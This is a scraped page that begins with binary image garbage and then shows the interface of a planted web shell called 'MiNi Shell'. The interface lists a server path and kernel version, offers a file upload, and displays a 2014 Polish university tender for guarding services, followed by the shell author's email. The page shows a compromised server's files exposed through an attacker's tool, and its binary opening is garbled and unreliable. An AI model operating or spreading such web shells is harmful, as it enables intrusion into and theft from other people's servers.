JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140117/11583-N-2014.html

<p class="kh_header"><b>Kalisz: OCHRONA  FIZYCZNA  OSÓB I  MIENIA ORAZ IMPREZ MASOWYCH  W OBIEKTACH PAŃSTWOWEJ  WYŻSZEJ  SZKOŁY  ZAWODOWEJ  im. Prezydenta  Stanisława  Wojciechowskiego  W  KALISZU</b><br>
<b>Numer ogłoszenia: 11583 - 2014; data zamieszczenia: 17.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 62 767 95 00, 767 95 32, faks 62 767 95 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OCHRONA  FIZYCZNA  OSÓB I  MIENIA ORAZ IMPREZ MASOWYCH  W OBIEKTACH PAŃSTWOWEJ  WYŻSZEJ  SZKOŁY  ZAWODOWEJ  im. Prezydenta  Stanisława  Wojciechowskiego  W  KALISZU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi profesjonalnej ochrony osób i mienia oraz imprez masowych Państwowej Wyższej  Szkoły Zawodowej im. Prezydenta Stanisława  Wojciechowskiego w Kaliszu - obiekty przy ulicy: Nowy Świat 4 ( siedziba główna i  Collegium Novum), Poznańskiej 201-205,  Kaszubskiej 13, Łódzkiej 149, zgodnie z ustawą  z dnia 22 sierpnia 1997 r. o ochronie osób i  mienia ( tj. Dz.U. z 2005 r., nr 145, poz.1221 ze zm.) oraz  ustawą z dnia 20 marca 2009 r.  o ochronie imprez masowych ( Dz. U. z 2009 r. Nr 62, poz. 504 ze zm.).
Zakres świadczonej usługi obejmować będzie:
2. Profesjonalną ochronę obiektów ( budynki i bezpośrednie otoczenie )- osób i mienia
PWSZ  w Kaliszu  przy ulicy: 1). Nowy Świat 4, główna siedziba (rektorat)-budynek czterokondygnacyjny, o pow. użytkowej ok. 3000,00 m2, w tym sale wykładowe, pracownia komputerowa,  aula na 270 miejsc, pom. wykładowców i biurowe, sanitariaty, hall, portiernia 3 klatki schodowe, budynek Collegium Novum (czterokondygnacyjny, z parkingiem podziemnym) - aula na 500 miejsc z zapleczem, sala gimnastyczna, sale wykładowe, 2 sale seminaryjne, pracownia komputerowa, pokoje wykładowców, biurowe, pom. sanitariatów,  2 klatki schodowe, halle, biblioteka i czytelnia, portiernia; codziennie w  godzinach od 2200 do 600 dnia następnego  tj. 8 godz. na dobę x 730 dni (365 + 365 ) =  5.840 godz. Należy uwzględnić również podgląd budynku administracyjnego, jednopiętrowego oraz poligrafii przy ul. Nowy Świat 5;
2). Kaszubskiej 13, budynek czterokondygnacyjny o pow. użytkowej  ok.2.850,00 m2
w tym: 23 sale wykładowe, 18 laboratoriów, aula na 150 miejsc, codziennie w godzinach od 2200  do 600 dnia następnego tj. 8 godz. na dobę x730 dni, (365 + 365 ) =  5.840godz.;
3). Łódzkiej 149, Dom Studenta BULIONIK, budynek sześciokondygnacyjny 
o pow. użyt.  ok. 5.858,00 m2   -   codziennie w godzinach  od 2200  do 600 dnia
następnego, tj. 8 godz. na dobę x 730 dni (365 + 365 ) =  5.840 godz.;
4). Poznańskiej 201-205,  całodobowo t.j. 24godz. na dobę x 730 dni (365 + 365 )
=17.520 godz., obiekt o  powierzchni działki 8,1510 ha, stanowiący  teren
zabudowany, w tym budynki:
A. budynek dydaktyczny z salą audytoryjną (Collegium Oecologicum)- pow.
użyt.2.670,57 m2, budynek murowany podpiwniczony, 3-kondygnacyjny, w tym
sala audytoryjna, hall wejściowy, 8 sal wykładowych i seminaryjnych, 
pracownie specjalistyczne, pokoje wykładowców, pomieszczenia wypożyczalni
zbiorów bibliotecznych,  pom. sanitarne, socjalne , dwie klatki  schodowe,
B. budynek dydaktyczno-laboratoryjny (Collegium Mechanicum) - pow. użyt.
4.035,66 m2,  budynek murowany 3 -kondygnacyjny , podpiwniczony, w tym:
sale wykładowe, laboratoria, czytelnia, pom. sanitarne, pokoje wykładowców,
pom. biurowe, dwie klatki schodowe, itp.
C. budynek Studium WF -o pow. użyt. 1.128 m2, parterowy, konstrukcja murowana,
stropodach kryty papą, w budynku; sala sportowa i 2 sale fitness i zaplecze
socjalne, magazyn sprzętu sportowego,
D. budynek laboratoryjno- dydaktyczny (D) - o pow. użyt. 635,55 m2, parterowy,
 murowany, w budynku;  pracownia komputerowa,  6 laboratoriów,  pom. sanitarne, 
hall, 2 pokoje  administracyjno- biurowe.
E. budynek (Mały Dom Gościnny Wojaczek) - o pow. użyt. 330,18 m2, parterowy,
 murowany, w tym 12 pokoi gościnnych z węzłem sanitarnym, kuchnia i korytarz,
F. budynek recepcyjny - portiernia o pow. użytkowej 118 m2, parterowy, okna
okratowane przed włamaniem, konstrukcja murowana, stropodach kryty papą , G. budynek toalet zewnętrznych, pow. użyt. 13m2,, konstrukcja murowana,
H. budynek parterowy tzw. Chata polska- konstrukcja drewniana, pow. użyt.130m2,  
 I. trafostacja - pow. użyt. 42 m2 , budynek parterowy, konstrukcja murowana,
stropodach kryty papą,
J. budynek szkoleniowy - pasywny - parterowy, dach z blachy stalowej
dachówkopodobnej, o pow. użytkowej 117,15 m2 .
K. budynek Centrum Dydaktycznego badań Kół Zębatych o powierzchni użytkowej 2093,50 m2 - w budowie.
Ogrodzenie całego terenu - trwałe z elementów żelbetowych prefabrykowanych, 
 oświetlenie terenu - sieć elektryczna podziemna, 42 punkty świetlne, drogi komunikacyjne 
asfaltowe, obiekt  położony przy trasie  Kalisz - Poznań z dala od zwartej zabudowy.
3. W każdym obiekcie pkt. 3.3.1 od 1) do 4) ochrona pełniona będzie przez jednego 
licencjonowanego pracownika ochrony, umundurowanego, posiadającego
identyfikator, wyposażonego w środki przymusu bezpośredniego, minimum
kajdanki, pałka wielofunkcyjna, ręczny  miotacz gazowy oraz będącego w stałym
kontakcie radiowym z dyspozytorem agencji i grupą interwencyjną. Ponadto
          posiadającego własną łączność bezprzewodową z bazą lub telefon komórkowy
          ( łączność niezależna od istniejącej w  PWSZ). 
4. Do obowiązków pracownika ochrony w obiekcie przy ul. Poznańskiej 201-205 należy
         również sprzedaż biletów parkingowych dla pojazdów wjeżdżających na teren posesji.
          Ochrona obiektu ma obejmować - zabezpieczenie wejścia ( wjazdu) na teren obiektu
          (budynku) osób niepowołanych i nieupoważnionych pojazdów, obchód obiektu,
          zabezpieczenie kluczy od pomieszczeń, zabezpieczenie  bezpieczeństwa w obiekcie oraz 
          informowanie Policji, Straży Pożarnej i Zamawiającego w razie zaistnienia  takiej
          konieczności.
5. Licencjonowani pracownicy ochrony wykonujący powierzone zadania służbowe zobowiązani są do znajomości obowiązujących instrukcji i procedur postępowania, rozmieszczenia infrastruktury technicznej oraz uczestnictwa w szkoleniach praktycznych dotyczących problematyki bezpieczeństwa osób i mienia w ochranianych obiektach.
6. Ochronę  imprez  masowych - plenerowych,  ( ok. 500 godz. w  roku), tj. sportowych
                 ( studenckich) i specjalnych (np. juwenalia ), zgodnie z ustawą z dnia 20 marca 2009 r. 
                 o ochronie imprez masowych .Terminy imprez masowych i ilość licencjonowanych
                 pracowników przeszkolonych w zakresie zabezpieczenia imprez masowych  będą podawane 
                 z 7 dniowym  wyprzedzeniem na podstawie odrębnego zlecenia.
Wykonawca w ramach przedmiotu zamówienia zainstaluje na własny koszt system telewizji
                 przemysłowej we wszystkich chronionych obiektach, 
7. Wykonawca  sam wybiera system telewizji przemysłowej, który powinien w sposób   
                 należyty zabezpieczyć interes Zamawiającego określony w umowie( w tym zamontować
                 między  innymi: kamery, monitory, nagrywarki, itp.), zgodnie z zapisem w § 3 umowy.
8. Czas realizacji systemów - do trzech miesięcy od daty podpisania umowy.
9. Własność Zamawiającego stanowi w obiekcie, przy:
        a). ul. Nowy Świat 4 - instalacja telewizji przemysłowej, system połączeń sygnalizacyjno- 
             alarmowych ( p.poż.),
        b). ul. Łódzka 149 -  wideofon- kamera przy drzwiach wejściowych do domu studenta,
             system połączeń sygnalizacyjno- alarmowych ( p.poż.),
       c) ul. Kaszubska 13 - instalacja telewizji przemysłowej,
       d) ul. Poznańska 201-205 - budynek Collegium Oecologicum - system sygnalizacji antywłamaniowej SATEL  INTEGRA, a budynek Collegium Mechanicum- system sygnalizacji  antywłamaniowej SATEL CA 64, system połączeń sygnalizacyjno- 
alarmowych ( p.poż.).
10.Zaleca się, aby Wykonawca zdobył wszelkie informacje  (dokonał wizji lokalnej na obiektach),  konieczne do przygotowania oferty oraz podpisania umowy.
11. Warunki dodatkowe dotyczące przedmiotu zamówienia:
 Wykonawca z którym Zamawiający podpisze umowę zobowiązany będzie do posiadania opłaconej polisy lub innego dokumentu  potwierdzającego,  że  Wykonawca  jest ubezpieczony od odpowiedzialności  cywilnej  (deliktowej i kontraktowej) w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia, na wartość co najmniej 500.000,00 złotych, obejmującej co najmniej okres wykonywania zamówienia. Szczegółowe wymogi dotyczące ubezpieczenia zawarte są w  § 6 projektu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności,  jeżeli 
przepisy prawa  nakładają obowiązek ich posiadania, tj.: posiadania aktualnej  koncesji wydanej przez Ministra Spraw  Wewnętrznych i Administracji na prowadzenie  działalności w zakresie  usług ochrony osób i mienia, w zakresie wymaganym ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, na obszarze, którego dotyczy przedmiotowe zamówienie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych, lub wykonywanych usług głównych w zakresie niezbędnym do wykazania spełnienia warunku, co najmniej  jednej usługi świadczonej w sposób ciągły  przez minimum 12 miesięcy, o wartości umowy min. 150.000, 00 zł. brutto, odpowiadających swoim  rodzajem i złożonością  porównywalną  z przedmiotem zamówienia - polegających na ochronie osób i mienia  w budynkach użyteczności publicznej, wraz z dołączonymi dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania całodobowym ( min. 4 zmiany) własnym patrolem grup interwencyjnych wyposażonym w  łączność radiową z osobami sprawującymi bezpośrednią ochronę fizyczną  we wszystkich obiektach, zgodnie z wymogami prawa;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania personelem ( minimum 10 osób)  wyznaczonym do wykonania  zamówienia, odpowiedzialnych za świadczenie usług ochrony osób i mienia, potwierdzających ich kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania przedmiotowego zmówienia ( posiadający  licencje - min. I stopnia ) oraz potwierdzenie z odbytego szkolenia w zakresie zabezpieczania imprez masowych  (min. 6 osób).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca, zgodnie z art.26 ust.2b ustawy może polegać na wiedzy i doświadczeniu, 
              potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach 
              finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
              stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, 
              iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 
              przedstawiając w ofercie w tym celu pisemne  ( w oryginale lub kopia poświadczona 
              notarialnie ) zobowiązanie  tych  podmiotów do oddania mu do dyspozycji  niezbędnych 
              zasobów na okres korzystania z nich przy wykonaniu  zamówienia. 
2. w przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
        o którym  mowa w ppkt. 10.2. lit.b lub ppkt.10.10 SIWZ
3. W przypadku Wykonawcy będącego osobą fizyczną, w
             celu umożliwienia Zamawiającemu identyfikacji danych Wykonawcy, Wykonawca
  zobowiązany jest przed podpisaniem umowy przedstawić aktualne zaświadczenie o wpisie
  do ewidencji działalności gospodarczej ( o ile zaświadczenia nie zostało przedstawione wraz   
  z ofertą) - oryginał dokumentu lub kopia poświadczona za zgodność z oryginałem przez 
  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić  za zgodą obu stron  wyrażoną  na piśmie w formie  aneksu do umowy, pod rygorem nieważności takiej zmiany i może zostać dokonana, o ile nie stoi w sprzeczności z regulacjami zawartymi w  ustawie Prawo zamówień publicznych.     
2. Podstawą dokonania zmiany zapisów umowy, poza przypadkami określonymi w umowie, będą:
1) zmiany przepisów prawa  powszechnie obowiązującego, jeśli zmiana ta wpływa na zakres lub warunki wykonania przez  strony świadczeń wynikających z umowy,
2) zmiana terminu realizacji zamówienia, wynikająca z czynników obiektywnych lub których strony nie były w stanie przewidzieć pomimo zachowania należytej staranności,
3) zmiana w  sposobie realizacji zamówienia polegająca na zmianie czasu ochrony, o której mowa w § 2 ust.2 niniejszej umowy i związana z tym zmiana wynagrodzenia lub inne zmiany z przyczyn organizacyjnych. 
3. Wystąpienie którejkolwiek z wymienionych powyżej okoliczności nie stanowi bezwzględnego  zobowiązania Zamawiającego do dokonania takich zmian, ani nie może stanowić podstawy roszczeń Wykonawcy do ich dokonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl/biuletyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, 62-800 Kalisz, ul. Nowy Świat 5 Dział techniczny, I piętro, pokój 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2014 godzina 11:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, 62-800 Kalisz, ul. Nowy Świat 5 Dział techniczny, I piętro, pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com